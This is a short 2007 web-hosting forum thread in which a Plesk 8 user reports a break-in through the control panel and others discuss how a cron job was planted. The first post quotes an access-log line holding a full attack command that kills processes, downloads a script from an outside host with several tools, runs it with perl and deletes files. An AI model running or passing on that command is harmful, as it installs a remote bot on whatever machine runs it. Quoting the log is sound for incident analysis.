1. Please take a little time for this simple survey! Thank you for participating!
    Dismiss Notice
  2. Dear Pleskians, please read this carefully! New attachments and other rules Thank you!
    Dismiss Notice
  3. Dear Pleskians, I really hope that you will share your opinion in this Special topic for chatter about Plesk in the Clouds. Thank you!
    Dismiss Notice

Security Violation plesk 8.0.X

Discussion in 'Plesk for Linux - 8.x and Older' started by stewartrose, May 26, 2007.

  1. stewartrose

    stewartrose Guest

    0
     
    Just for interest..

    Hacked through Plesk control panel.

    httpsd_access_log:xxx.xxx.xxx.xxx - - [26/May/2007:00:00:24 +0100] "POST /sysuser/crontab_edit.php?cmd=update&cte_enabled=true&cte_minute=*&cte_hour=*&cte_dom=*&cte_month=*&cte_dow=*&cte_cmd=cd%20/usr/local/lib/;killall%20-9%20perl;rm%20-rf%20flaviu;curl%20-O%20http://flaviu.ro/flaviu;wget%20http://flaviu.ro/flaviu;lynx%20-source%20http://flaviu.ro/flaviu;fetch%20www.flaviu.ro/flaviu;GET%20http://flaviu.ro/flaviu;perl%20flaviu;rm%20-rf%20x* HTTP/1.1" 200 366

    All the best from Alan
     
  2. atomicturtle

    atomicturtle Golden Pleskian

    29
     
    Joined:
    Nov 20, 2002
    Messages:
    2,110
    Likes Received:
    7
    Location:
    Washington, DC
    Thats a risk you take whenever you allow a user to modify cron. They can execute any command on the system that they want.

    What happened there is that someone with a valid logon set up a cron job to download that script (an irc zombie bot) and run it.
     
  3. stewartrose

    stewartrose Guest

    0
     
    Hi atomicturtle,

    Not quite, no one has access to the cp but me, and my passwords are very strong, the code given uploads data through the exploit..

    all the best from Alan
     
  4. atomicturtle

    atomicturtle Golden Pleskian

    29
     
    Joined:
    Nov 20, 2002
    Messages:
    2,110
    Likes Received:
    7
    Location:
    Washington, DC
    Then its possible your desktop has been compromised. You cannot access the cron settings without being logged into the CP.
     
Loading...